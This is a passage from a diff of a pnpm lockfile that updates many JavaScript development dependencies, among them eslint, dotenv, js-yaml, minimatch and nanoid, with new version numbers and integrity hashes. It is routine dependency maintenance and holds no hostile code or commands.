@@ -1677,8 +1396,8 @@ packages:
     resolution: {integrity: sha512-1gxPBJpI/pcjQhKgIU91II6Wkay+dLcN3M6rf2uwP8hRur3HtQXjVrdAK3sjC0piaEuxzMwjXChcETiJl47lAQ==}
     engines: {node: '>=18'}
 
-  dotenv@17.2.3:
-    resolution: {integrity: sha512-JVUnt+DUIzu87TABbhPmNfVdBDt18BLOWjMUFJMSi/Qqg7NTYtabbvSNJGOJ7afbRuv9D/lngizHtP7QyLQ+9w==}
+  dotenv@17.4.2:
+    resolution: {integrity: sha512-nI4U3TottKAcAD9LLud4Cb7b2QztQMUEfHbvhTH09bqXTxnSie8WnjPALV/WMCrJZ6UV/qHJ6L03OqO3LcdYZw==}
     engines: {node: '>=12'}
 
   dotenv@8.6.0:
@@ -1711,13 +1430,8 @@ packages:
     resolution: {integrity: sha512-V0hjH4dGPh9Ao5p0MoRY6BVqtwCjhz6vI5LT8AJ55H+4g9/4vbHx1I54fS0XuclLhDHArPQCiMjDxjaL8fPxhw==}
     engines: {node: '>=0.12'}
 
-  es-module-lexer@1.7.0:
-    resolution: {integrity: sha512-jEQoCwk8hyb2AZziIOLhDqpm5+2ww5uIE6lkO/6jcOCusfk6LhMHpXXfBLXTZ7Ydyt0j4VoUQv6uGNYbdW+kBA==}
-
-  esbuild@0.24.2:
-    resolution: {integrity: sha512-+9egpBW8I3CD5XPe0n6BfT5fxLzxrlDzqydF3aviG+9ni1lDC/OvMHcxqEFV0+LANZG5R1bFMWfUrjVsdwxJvA==}
-    engines: {node: '>=18'}
-    hasBin: true
+  es-module-lexer@2.3.1:
+    resolution: {integrity: sha512-shc1dbU90Yl/xq1QrC7QRtfcwURZuVRfPhZbDoldJ1cn1gzDvBaBWlv0eFolj5+0znnPJz5TXLxsN77X/12KTA==}
 
   esbuild@0.25.11:
     resolution: {integrity: sha512-KohQwyzrKTQmhXDW1PjCv3Tyspn9n5GcY2RTDqeORIdIJY8yKIF7sTSopFmn/wpMPW4rdPXI0UE5LJLuq3bx0Q==}
@@ -1759,8 +1473,8 @@ packages:
     peerDependencies:
       eslint: '>=8'
 
-  eslint-plugin-prettier@5.5.4:
-    resolution: {integrity: sha512-swNtI95SToIz05YINMA6Ox5R057IMAmWZ26GqPxusAp1TZzj+IdY9tXNWWD3vkF/wEqydCONcwjTFpxybBqZsg==}
+  eslint-plugin-prettier@5.5.6:
+    resolution: {integrity: sha512-ifetmTcxWfz+4qRW3pH/ujdTq2jQIj59AxJMIN26K5avYgU8dxycUETQonWiW+wPrYXA0j3Try0l1CnwVQtDqQ==}
     engines: {node: ^14.18.0 || >=16.0.0}
     peerDependencies:
       '@types/eslint': '>=8.0.0'
@@ -1792,16 +1506,16 @@ packages:
     resolution: {integrity: sha512-wpc+LXeiyiisxPlEkUzU6svyS1frIO3Mgxj1fdy7Pm8Ygzguax2N3Fa/D/ag1WqbOprdI+uY6wMUl8/a2G+iag==}
     engines: {node: ^12.22.0 || ^14.17.0 || >=16.0.0}
 
-  eslint-visitor-keys@4.2.0:
-    resolution: {integrity: sha512-UyLnSehNt62FFhSwjZlHmeokpRK59rcz29j+F1/aDgbkbRTk7wIc9XzdoasMUbRNKDM0qQt/+BJ4BrpFeABemw==}
-    engines: {node: ^18.18.0 || ^20.9.0 || >=21.1.0}
-
   eslint-visitor-keys@4.2.1:
     resolution: {integrity: sha512-Uhdk5sfqcee/9H/rCOJikYz67o0a2Tw2hGRPOG2Y1R2dg7brRe1uG0yaNQDHu+TO/uQPF/5eCapvYSmHUjt7JQ==}
     engines: {node: ^18.18.0 || ^20.9.0 || >=21.1.0}
 
-  eslint@9.38.0:
-    resolution: {integrity: sha512-t5aPOpmtJcZcz5UJyY2GbvpDlsK5E8JqRqoKtfiKE3cNh437KIqfJr3A3AKf5k64NPx6d0G3dno6XDY05PqPtw==}
+  eslint-visitor-keys@5.0.1:
+    resolution: {integrity: sha512-tD40eHxA35h0PEIZNeIjkHoDR4YjjJp34biM0mDvplBe//mB+IHCqHDGV7pxF+7MklTvighcCPPZC7ynWyjdTA==}
+    engines: {node: ^20.19.0 || ^22.13.0 || >=24}
+
+  eslint@9.39.5:
+    resolution: {integrity: sha512-DgZS62aPLXKlnxILS/AYCoRvHaZeXceIzlXPkkGGzJWSow1aEk0lbTlxUSlyjC8jcaKxAdOnTDz+o1JFSBsyjw==}
     engines: {node: ^18.18.0 || ^20.9.0 || >=21.1.0}
     hasBin: true
     peerDependencies:
@@ -1819,8 +1533,8 @@ packages:
     engines: {node: '>=4'}
     hasBin: true
 
-  esquery@1.6.0:
-    resolution: {integrity: sha512-ca9pw9fomFcKPvFLXhBKUK90ZvGibiGOvRJNbjljY7s7uq/5YO4BOzcYtJqExdx99rF6aAcnRxHmcUHcz6sQsg==}
+  esquery@1.7.0:
+    resolution: {integrity: sha512-Ap6G0WQwcU/LHsvLwON1fAQX9Zp0A2Y6Y/cJBl9r/JbW90Zyg4/zbG6zzKa2OTALELarYHmKu0GhpM5EO+7T0g==}
     engines: {node: '>=0.10'}
 
   esrecurse@4.3.0:
@@ -1841,12 +1555,15 @@ packages:
     resolution: {integrity: sha512-kVscqXk4OCp68SZ0dkgEKVi6/8ij300KBWTJq32P/dYeWTSwK41WyTxalN1eRmA5Z9UU/LX9D7FWSmV9SAYx6g==}
     engines: {node: '>=0.10.0'}
 
-  expect-type@1.2.2:
-    resolution: {integrity: sha512-JhFGDVJ7tmDJItKhYgJCGLOWjuK9vPxiXoUFLwLDc99NlmklilbiQJwoctZtt13+xMw91MCk/REan6MWHqDjyA==}
+  expect-type@1.4.0:
+    resolution: {integrity: sha512-KfYbmpRm0VbLjEvVa9yGwCi9GI34xvi7A/HXYWQO65CSD2u3MczUJSuwXKFIxlGsgBQizV9q5J9NHj4VG0n+pA==}
     engines: {node: '>=12.0.0'}
 
   exsolve@1.0.7:
     resolution: {integrity: sha512-VO5fQUzZtI6C+vx4w/4BWJpg3s/5l+6pRQEHzFRM8WFi4XffSP1Z+4qi7GbjWbvRQEbdIco5mIMq+zX4rPuLrw==}
+
+  exsolve@1.1.0:
+    resolution: {integrity: sha512-D+42+T12DdIlJM3uepa55qGiL3sYdLBOxIl2ifQCzCHz4c7eiolaHsi3BIqEr7JxBzxv2pYZQX9kw16ziMcEmw==}
 
   extendable-error@0.1.7:
     resolution: {integrity: sha512-UOiS2in6/Q0FK0R0q6UY9vYpQ21mr/Qn1KOnte7vsACuNJf514WvCCUHSRCPcgjPT2bAhNIJdlE6bVap1GKmeg==}
@@ -1867,20 +1584,21 @@ packages:
   fast-levenshtein@2.0.6:
     resolution: {integrity: sha512-DCXu6Ifhqcks7TZKY3Hxp3y6qphY5SJZmrWMDrKcERSOXWQdMhU9Ig/PYrzyw/ul9jOIyh0N4M0tbC5hodg8dw==}
 
+  fast-string-truncated-width@3.0.3:
+    resolution: {integrity: sha512-0jjjIEL6+0jag3l2XWWizO64/aZVtpiGE3t0Zgqxv0DPuxiMjvB3M24fCyhZUO4KomJQPj3LTSUnDP3GpdwC0g==}
+
+  fast-string-width@3.0.2:
+    resolution: {integrity: sha512-gX8LrtNEI5hq8DVUfRQMbr5lpaS4nMIWV+7XEbXk2b8kiQIizgnlr12B4dA3ZEx3308ze0O4Q1R+cHts8kyUJg==}
+
+  fast-wrap-ansi@0.2.2:
+    resolution: {integrity: sha512-7F2Fl+TjRSenLqlU3UjSH0iyqopqoZIu7eZVpEirP2g1GtWa2G/ecEmBdgz31+Mxr+ELclgg6sokpSFIQiZ02Q==}
+
   fastest-levenshtein@1.0.16:
     resolution: {integrity: sha512-eRnCtTTtGZFpQCwhJiUOuxPQWRXVKYDn0b2PeHfXL6/Zi53SLAzAHfVhVWK2AryC/WH05kGfxhFIPvTF0SXQzg==}
     engines: {node: '>= 4.9.1'}
 
   fastq@1.19.0:
     resolution: {integrity: sha512-7SFSRCNjBQIZH/xZR3iy5iQYR8aGBE0h3VG6/cwlbrpdciNYBMotQav8c1XI3HjHH+NikUpP53nPdlZSdWmFzA==}
-
-  fdir@6.4.3:
-    resolution: {integrity: sha512-PMXmW2y1hDDfTSRc9gaXIuCCRpuoz3Kaz8cUelp3smouvfT632ozg2vrT6lJsHKKOF59YLbOGfAWGUcKEfRMQw==}
-    peerDependencies:
-      picomatch: ^3 || ^4
-    peerDependenciesMeta:
-      picomatch:
-        optional: true
 
   fdir@6.5.0:
     resolution: {integrity: sha512-tIbYtZbucOs0BRGqPJkshJUYdL+SDH7dVM8gjy+ERp3WAUjLEFJE+02kanyHtwjWOnwrKYBiwAmM0p4kLJAnXg==}
@@ -1898,10 +1616,6 @@ packages:
   fill-range@7.1.1:
     resolution: {integrity: sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==}
     engines: {node: '>=8'}
-
-  filter-obj@5.1.0:
-    resolution: {integrity: sha512-qWeTREPoT7I0bifpPUXtxkZJ1XJzxWtfoWWkdVGqa+eCr3SHW/Ocp89o8vLvbUuQnadybJpjOKu4V+RwO6sGng==}
-    engines: {node: '>=14.16'}
 
   find-up-simple@1.0.1:
     resolution: {integrity: sha512-afd4O7zpqHeRyg4PfDQsXmlDe2PfdHtJt6Akt8jOWaApLOZk5JXs6VMR29lz03pRe9mpykrRCYIYxaJYcfpncQ==}
@@ -1922,12 +1636,8 @@ packages:
     resolution: {integrity: sha512-f7ccFPK3SXFHpx15UIGyRJ/FJQctuKZ0zVuN3frBo4HnK3cay9VEW0R6yPYFHC0AgqhukPzKjq22t5DmAyqGyw==}
     engines: {node: '>=16'}
 
-  flatted@3.3.2:
-    resolution: {integrity: sha512-AiwGJM8YcNOaobumgtng+6NHuOqC3A7MixFeDafM3X9cIUM+xUXoS5Vfgf+OihAYe20fxqNM9yPBXJzRtZ/4eA==}
-
-  foreground-child@3.3.0:
-    resolution: {integrity: sha512-Ld2g8rrAyMYFXBhEqMz8ZAHBi4J4uS1i/CxGMDnjyFWddMXLVcDp051DZfu+t7+ab7Wv6SMqpWmyFIj5UbfFvg==}
-    engines: {node: '>=14'}
+  flatted@3.4.2:
+    resolution: {integrity: sha512-PjDse7RzhcPkIJwy5t7KPWQSZ9cAbzQXcafsetQoD7sOJRQlGikNbx7yZp2OotDnJyrDcbyRq3Ttb18iYOqkxA==}
 
   fraction.js@4.3.7:
     resolution: {integrity: sha512-ZsDfxO51wGAXREY55a7la9LScWpwv9RxIrYABrlvOFBlH/ShPnrtsXeuUIfXKKOVicNxQ+o8JTbJvjS4M89yew==}
@@ -1956,6 +1666,10 @@ packages:
     resolution: {integrity: sha512-L5bGsVkxJbJgdnwyuheIunkGatUF/zssUoxxjACCseZYAVbaqdh9Tsmmlkl8vYan09H7sbvKt4pS8GqKLBrEzA==}
     hasBin: true
 
+  giget@3.3.0:
+    resolution: {integrity: sha512-gzi2D96p+AMfDcmJHGDj3KJ9NRiwvlFAU5yfa3ROwWZmFUjX4P43x3BcyRaOMMLto1vUo7C+86+MFhYTl6Ryiw==}
+    hasBin: true
+
   glob-parent@5.1.2:
     resolution: {integrity: sha512-AOIgSQCepiJYwP3ARnGx+5VnTu2HBYdzbGP45eLw1vr3zB3vZLeyed1sC9hnbcOc9/SrMyM5RPQrkGz4aS9Zow==}
     engines: {node: '>= 6'}
@@ -1969,10 +1683,6 @@ packages:
     engines: {node: '>=10.0'}
     peerDependencies:
       tslib: '2'
-
-  glob@10.4.5:
-    resolution: {integrity: sha512-7Bv8RF0k6xjo7d4A/PxYLbUCfb6c+Vpd2/mB2yRDlew7Jb5hEXiCD9ibfO7wpk8i4sevK6DFny9h7EYbM3/sHg==}
-    hasBin: true
 
   global-directory@4.0.1:
     resolution: {integrity: sha512-wHTUcDUoZ1H5/0iVqEudYW4/kAlN5cZ3j/bXn0Dpbizl9iaUVeWSHqiOjsgk6OW2bkLclbBjzewBz6weQ1zA2Q==}
@@ -1995,9 +1705,6 @@ packages:
 
   graceful-fs@4.2.11:
     resolution: {integrity: sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==}
-
-  graphemer@1.4.0:
-    resolution: {integrity: sha512-EtKwoO6kxCL9WO5xipiHTZlSzBm7WLT627TqC/uVRd0HKmq8NXyebnNYxDoBi7wt8eTWrUrKXCOVaFq9x1kgag==}
 
   has-flag@4.0.0:
     resolution: {integrity: sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==}
@@ -2029,8 +1736,8 @@ packages:
     resolution: {integrity: sha512-hsBTNUqQTDwkWtcdYI2i06Y/nUBEsNEDJKjWdigLvegy8kDuJAS8uRlpkkcQpyEXL0Z/pjDy5HBmMjRCJ2gq+g==}
     engines: {node: '>= 4'}
 
-  ignore@7.0.3:
-    resolution: {integrity: sha512-bAH5jbK/F3T3Jls4I0SO1hmPR0dKU0a7+SY6n1yzRtG54FLO8d6w/nxLFX2Nb7dBu6cCWXPaAME6cYqFUMmuCA==}
+  ignore@7.0.6:
+    resolution: {integrity: sha512-BAg6QkE8W+TuQLrrw0Ugr7HegXduRuuj8/ti2kSOc+jz1dmx8/WNcjr6XGnq5YpDWxFwwaavqD0+jIUOKelTsw==}
     engines: {node: '>= 4'}
 
   import-fresh@3.3.1:
@@ -2124,10 +1831,6 @@ packages:
     resolution: {integrity: sha512-eXK1UInq2bPmjyX6e3VHIzMLobc4J94i4AWn+Hpq3OU5KkrRC96OAcR3PRJ/pGu6m8TRnBHP9dkXQVsT/COVIA==}
     engines: {node: '>=0.10.0'}
 
-  isbinaryfile@5.0.6:
-    resolution: {integrity: sha512-I+NmIfBHUl+r2wcDd6JwE9yWje/PIVY/R5/CmV8dXLZd5K+L9X2klAOwfAHNnondLXkbHyTAleQAWonpTJBTtw==}
-    engines: {node: '>= 18.0.0'}
-
   isexe@2.0.0:
     resolution: {integrity: sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==}
 
@@ -2142,16 +1845,9 @@ packages:
     resolution: {integrity: sha512-GCfE1mtsHGOELCU8e/Z7YWzpmybrx/+dSTfLrvY8qRmaY6zXTKWn6WQIjaAFw069icm6GVMNkgu0NzI4iPZUNw==}
     engines: {node: '>=10'}
 
-  istanbul-lib-source-maps@5.0.6:
-    resolution: {integrity: sha512-yg2d+Em4KizZC5niWhQaIomgf5WlL4vOOjZ5xGCmF8SnPE/mDWWXgvRExdcpCgh9lLRRa1/fSYp2ymmbJ1pI+A==}
-    engines: {node: '>=10'}
-
-  istanbul-reports@3.1.7:
-    resolution: {integrity: sha512-BewmUXImeuRk2YY0PVbxgKAysvhRPUQE0h5QRM++nVWyubKGV0l8qQ5op8+B2DOmwSe63Jivj0BjkPQVf8fP5g==}
+  istanbul-reports@3.2.0:
+    resolution: {integrity: sha512-HGYWWS/ehqTV3xN10i23tkPkpH46MLCIMFNCaaKNavAXTF1RkqxawEPtnjnGZ6XKSInBKkiOA5BKS+aZiY3AvA==}
     engines: {node: '>=8'}
-
-  jackspeak@3.4.3:
-    resolution: {integrity: sha512-OGlZQpz2yfahA/Rd1Y8Cd9SIEsqvXkLVoSw/cgwhnhFMDbsQFeZYoJJ7bIZBS9BcamUW96asq/npPWugM+RQBw==}
 
   jiti@1.21.7:
     resolution: {integrity: sha512-/imKNG4EbWNrVjoNC/1H5/9GFy+tqjGBHCaSsN+P2RnPqjsLmv6UD3Ej+Kj8nBWaRAwyk7kK5ZUc+OEatnTR3A==}
@@ -2165,18 +1861,18 @@ packages:
     resolution: {integrity: sha512-ekilCSN1jwRvIbgeg/57YFh8qQDNbwDb9xT/qu2DAHbFFZUicIl4ygVaAvzveMhMVr3LnpSKTNnwt8PoOfmKhQ==}
     hasBin: true
 
+  js-tokens@10.0.0:
+    resolution: {integrity: sha512-lM/UBzQmfJRo9ABXbPWemivdCW8V2G8FHaHdypQaIy523snUjog0W71ayWXTjiR+ixeMyVHN2XcpnTd/liPg/Q==}
+
   js-tokens@4.0.0:
     resolution: {integrity: sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==}
 
-  js-tokens@9.0.1:
-    resolution: {integrity: sha512-mxa9E9ITFOt0ban3j6L5MpjwegGz6lBQmM1IJkWeBZGcMxto50+eWdjC/52xDbS2vy0k7vIMK0Fe2wfL9OQSpQ==}
-
-  js-yaml@3.14.1:
-    resolution: {integrity: sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==}
+  js-yaml@3.15.0:
+    resolution: {integrity: sha512-ttBQIIQPDeLjpPOohtUdXuXUVoA2uIB6fEH9HyJ7234s5mBJ5wTx20njxplLZQgLaOfpmPQA7X2t5AX6tIPbog==}
     hasBin: true
 
-  js-yaml@4.1.0:
-    resolution: {integrity: sha512-wpxZs9NoxZaJESJGIZTyDEaYpl0FKSA+FB9aJiyemKhMwkxQg63h4T1KJgUGHpTqPDNRcmmYLugrRjJlBtWvRA==}
+  js-yaml@4.3.0:
+    resolution: {integrity: sha512-1td788aAnnZ5qs7V2QIRl1owjtYpbKt749Y3xauqQgwIIGF/xXWz1wMTEBx5O3LK3lXLVuqXPdPxj2BoFHaW9Q==}
     hasBin: true
 
   jsesc@3.0.2:
@@ -2300,23 +1996,14 @@ packages:
   lodash.uniq@4.5.0:
     resolution: {integrity: sha512-xfBaXQd9ryd9dlSDvnvI0lvxfLJlYAZzXomUYzLKtUeOQvOP5piqAWuGtrhWeqaXK9hhoM/iyJc5AV+XfsX3HQ==}
 
-  loupe@3.1.3:
-    resolution: {integrity: sha512-kkIp7XSkP78ZxJEsSxW3712C6teJVoeHHwgo9zJ380de7IYyJ2ISlxojcH2pC5OFLewESmnRi/+XCDIEEVyoug==}
-
-  loupe@3.2.1:
-    resolution: {integrity: sha512-CdzqowRJCeLU72bHvWqwRBBlLcMEtIvGrlvef74kMnV2AolS9Y8xUv1I0U/MNAWMhBlKIoyuEgoJ0t/bbwHbLQ==}
-
-  lru-cache@10.4.3:
-    resolution: {integrity: sha512-JNAzZcXrCt42VGLuYz0zfAzDfAvJWW6AfYlDBQyDV5DClI2m5sAmK+OIO7s59XfsRsWHp02jAJrRadPRGTt6SQ==}
-
   magic-string@0.30.17:
     resolution: {integrity: sha512-sNPKHvyjVf7gyjwS4xGTaW/mCnF8wnjtifKBEhxfZ7E/S8tQ0rssrwGNn6q8JH/ohItJfSQp9mBtQYuTlH5QnA==}
 
-  magic-string@0.30.19:
-    resolution: {integrity: sha512-2N21sPY9Ws53PZvsEpVtNuSW+ScYbQdp4b9qUaL+9QkHUrGFKo56Lg9Emg5s9V/qrtNBmiR01sYhUOwu3H+VOw==}
+  magic-string@0.30.21:
+    resolution: {integrity: sha512-vd2F4YUyEXKGcLHoq+TEyCjxueSeHnFxyyjNp80yg0XV4vUhnDer/lvvlqM/arB5bXQN5K2/3oinyCRyx8T2CQ==}
 
-  magicast@0.3.5:
-    resolution: {integrity: sha512-L0WhttDl+2BOsybvEOLK7fW3UA0OQ0IQ2d6Zl2x/a6vVRs3bAY0ECOSHHeL5jD+SbOpOCUEi0y1DgHEn9Qn1AQ==}
+  magicast@0.5.3:
+    resolution: {integrity: sha512-pVKE4UdSQ7DvHzivsCIFx2BJn1mHG6KsyrFcaxFx6tONdneEuThrDx0Cj3AMg58KyN4pzYT+LHOotxDQDjNvkw==}
 
   make-dir@4.0.0:
     resolution: {integrity: sha512-hXdUTZYIVOt1Ex//jAQi+wTZZpUpwBj/0QsOzqegb3rGMMeJiSEu5xLHnYfBrRV4RH2+OCSOO95Is/7x1WJ4bw==}
@@ -2340,8 +2027,10 @@ packages:
   mdn-data@2.12.2:
     resolution: {integrity: sha512-IEn+pegP1aManZuckezWCO+XZQDplx1366JoVhTpMpBB1sPey/SbveZQUosKiKiGYjg1wH4pMlNgXbCiYgihQA==}
 
-  memfs@4.49.0:
-    resolution: {integrity: sha512-L9uC9vGuc4xFybbdOpRLoOAOq1YEBBsocCs5NVW32DfU+CZWWIn3OVF+lB8Gp4ttBVSMazwrTrjv8ussX/e3VQ==}
+  memfs@4.64.0:
+    resolution: {integrity: sha512-Kw72fgY7Wn+sD8KmtNWSafl1dz0UvAsE/PHs3YVfLiaZuA3HxNm9sRLqAu0ATiBGJvME1PxZXbBZPv5GycDeAw==}
+    peerDependencies:
+      tslib: '2'
 
   merge2@1.4.1:
     resolution: {integrity: sha512-8q7VEgMJW4J8tcfVPy8g09NcQwZdbwFEqhe/WZkoIzjn/3TGDwtOCYtXGxA3O8tPzpczCCDgv+P2P5y00ZJOOg==}
@@ -2354,19 +2043,15 @@ packages:
     resolution: {integrity: sha512-PXwfBhYu0hBCPw8Dn0E+WDYb7af3dSLVWKi3HGv84IdF4TyFoC0ysxFd0Goxw7nSv4T/PzEJQxsYsEiFCKo2BA==}
     engines: {node: '>=8.6'}
 
-  minimatch@3.1.2:
-    resolution: {integrity: sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==}
+  minimatch@10.2.5:
+    resolution: {integrity: sha512-MULkVLfKGYDFYejP07QOurDLLQpcjk7Fw+7jXS2R2czRQzR56yHRveU5NDJEOviH+hETZKSkIk5c+T23GjFUMg==}
+    engines: {node: 18 || 20 || >=22}
 
-  minimatch@9.0.5:
-    resolution: {integrity: sha512-G6T0ZX48xgozx7587koeX9Ys2NYy6Gmv//P89sEte9V9whIapMNF4idKxnW2QtCcLiTWlb/wfCabAtAFWhhBow==}
-    engines: {node: '>=16 || 14 >=14.17'}
+  minimatch@3.1.5:
+    resolution: {integrity: sha512-VgjWUsnnT6n+NUk6eZq77zeFdpW2LWDzP6zFGrCbHXiYNul5Dzqk2HHQ5uFH2DNW5Xbp8+jVzaeNt94ssEEl4w==}
 
   minimist@1.2.8:
     resolution: {integrity: sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==}
-
-  minipass@7.1.2:
-    resolution: {integrity: sha512-qOOzS1cBTWYF4BH8fVePDBOO9iptMnGUEZwNc/cMWnTV2nVLZ7VoNWEPHkYczZA0pdoA7dl6e7FL659nX9S2aw==}
-    engines: {node: '>=16 || 14 >=14.17'}
 
   mkdist@2.4.1:
     resolution: {integrity: sha512-Ezk0gi04GJBkqMfsksICU5Rjoemc4biIekwgrONWVPor2EO/N9nBgN6MZXAf7Yw4mDDhrNyKbdETaHNevfumKg==}
@@ -2406,13 +2091,8 @@ packages:
   ms@2.1.3:
     resolution: {integrity: sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==}
 
-  nanoid@3.3.11:
-    resolution: {integrity: sha512-N8SpfPUnUp1bK+PMYW8qSWdl9U+wwNWI4QKxOYDy9JAro3WMX7p2OeVRF9v+347pnakNevPmiHhNmZ2HbFA76w==}
-    engines: {node: ^10 || ^12 || ^13.7 || ^14 || >=15.0.1}
-    hasBin: true
-
-  nanoid@3.3.8:
-    resolution: {integrity: sha512-WNLf5Sd8oZxOm+TzppcYk8gVOgP+l58xNy58D0nbUnOxOWRWvlcCV4kUF7ltmI6PsrLl/BgKEyS4mqsGChFN0w==}
+  nanoid@3.3.16:
+    resolution: {integrity: sha512-bzlKTyNJ7+LdGIIwy8ijFpIqEQIvafahV7eYykJ8Cvh42EdJeODoJ6gUJXpQJvej1BddH8OqTXZNE/KfbWAu8Q==}
     engines: {node: ^10 || ^12 || ^13.7 || ^14 || >=15.0.1}
     hasBin: true
 
@@ -2424,6 +2104,9 @@ packages:
 
   node-fetch-native@1.6.6:
     resolution: {integrity: sha512-8Mc2HhqPdlIfedsuZoc3yioPuzp6b+L5jRCRY1QzuWZh2EGJVQrGppC6V6cF0bLdbW0+O2YpqCA25aF/1lvipQ==}
+
+  node-fetch-native@1.6.7:
+    resolution: {integrity: sha512-g9yhqoedzIUm0nTnTqAQvueMPVOuIY16bqgAJJC8XOOubYFNwz6IER9qs0Gq2Xd0+CecCKFjtdDTMA4u4xG06Q==}
 
   node-fetch@2.7.0:
     resolution: {integrity: sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==}
@@ -2452,14 +2135,15 @@ packages:
     engines: {node: ^14.16.0 || >=16.10.0}
     hasBin: true
 
-  ofetch@1.4.1:
-    resolution: {integrity: sha512-QZj2DfGplQAr2oj9KzceK9Hwz6Whxazmn85yYeVuS3u9XTMOGMRx0kO95MQ+vLsj/S/NwBDMMLU5hpxvI6Tklw==}
+  obug@2.1.4:
+    resolution: {integrity: sha512-4a+OsYv9UktOJKE+l1A4OufDgdRF9PifWj+tJnHURo/P+WOxpG4GzUFL9qCalmWauao6ogiG+QvnCovwPoyAWA==}
+    engines: {node: '>=12.20.0'}
+
+  ofetch@1.5.1:
+    resolution: {integrity: sha512-2W4oUZlVaqAPAil6FUg/difl6YhqhUR7x2eZY4bQCko22UXg3hptq9KLQdqFClV+Wu85UX7hNtdGTngi/1BxcA==}
 
   ohash@2.0.11:
     resolution: {integrity: sha512-RdR9FQrFwNBNXAr4GixM8YaRZRJ5PUWbKYbE5eOsrwAjJW0q2REGcf79oYPsLyskQCZG1PLN+S/K1V00joZAoQ==}
-
-  once@1.4.0:
-    resolution: {integrity: sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==}
 
   optionator@0.9.4:
     resolution: {integrity: sha512-6IpQ7mKUxRcZNLIObR0hz7lxsapSSIYNZJwXPGeF0mTVqGKFIXj1DQcMoT22S3ROcLyY/rz0PWaWZ9ayWmad9g==}
@@ -2496,9 +2180,6 @@ packages:
     resolution: {integrity: sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==}
     engines: {node: '>=6'}
 
-  package-json-from-dist@1.0.1:
-    resolution: {integrity: sha512-UEZIS3/by4OC8vL3P2dTXRETpebLI2NiI5vIrjaD/5UtrkFX/tNbwjTSRAGC/+7CAo2pIcBaRgWmcBBHcsaCIw==}
-
   package-json@10.0.1:
     resolution: {integrity: sha512-ua1L4OgXSBdsu1FPb7F3tYH0F48a6kxvod4pLUlGY9COeJAJQNX/sNH2IiEmsxw7lqYiAwrdHMjz1FctOsyDQg==}
     engines: {node: '>=18'}
@@ -2527,10 +2208,6 @@ packages:
   path-parse@1.0.7:
     resolution: {integrity: sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==}
 
-  path-scurry@1.11.1:
-    resolution: {integrity: sha512-Xa4Nw17FS9ApQFJ9umLiJS4orGjm7ZzwUrwamcGQuHSzDyth9boKDaycYdDcZDuqYATXw4HFXgaqWTctW/v1HA==}
-    engines: {node: '>=16 || 14 >=14.18'}
-
   path-type@4.0.0:
     resolution: {integrity: sha512-gDKb8aZMDeD/tZWs9P6+q0J9Mwkdl6xMV8TjnGP3qJVJ06bdMgkbBlLU8IdfOsIsFz2BW1rNVT3XuNEl8zPAvw==}
     engines: {node: '>=8'}
@@ -2541,34 +2218,26 @@ packages:
   pathe@2.0.3:
     resolution: {integrity: sha512-WUjGcAqP1gQacoQe+OBJsFA7Ld4DyXuUIjZ5cc75cLHvJ7dtNsTugphxIADwspS+AraAUePCKrSVtPLFj/F88w==}
 
-  pathval@2.0.0:
-    resolution: {integrity: sha512-vE7JKRyES09KiunauX7nd2Q9/L7lhok4smP9RZTDeD4MVs72Dp2qNFVz39Nz5a0FVEW0BJR6C0DYrq6unoziZA==}
-    engines: {node: '>= 14.16'}
-
-  perfect-debounce@2.0.0:
-    resolution: {integrity: sha512-fkEH/OBiKrqqI/yIgjR92lMfs2K8105zt/VT6+7eTjNwisrsh47CeIED9z58zI7DfKdH3uHAn25ziRZn3kgAow==}
+  perfect-debounce@2.1.0:
+    resolution: {integrity: sha512-LjgdTytVFXeUgtHZr9WYViYSM/g8MkcTPYDlPa3cDqMirHjKiSZPYd6DoL7pK8AJQr+uWkQvCjHNdiMqsrJs+g==}
 
   picocolors@1.1.1:
     resolution: {integrity: sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==}
 
-  picomatch@2.3.1:
-    resolution: {integrity: sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==}
+  picomatch@2.3.2:
+    resolution: {integrity: sha512-V7+vQEJ06Z+c5tSye8S+nHUfI51xoXIXjHQ99cQtKUkQqqO1kO/KCJUfZXuB47h/YBlDhah2H3hdUGXn8ie0oA==}
     engines: {node: '>=8.6'}
 
-  picomatch@4.0.2:
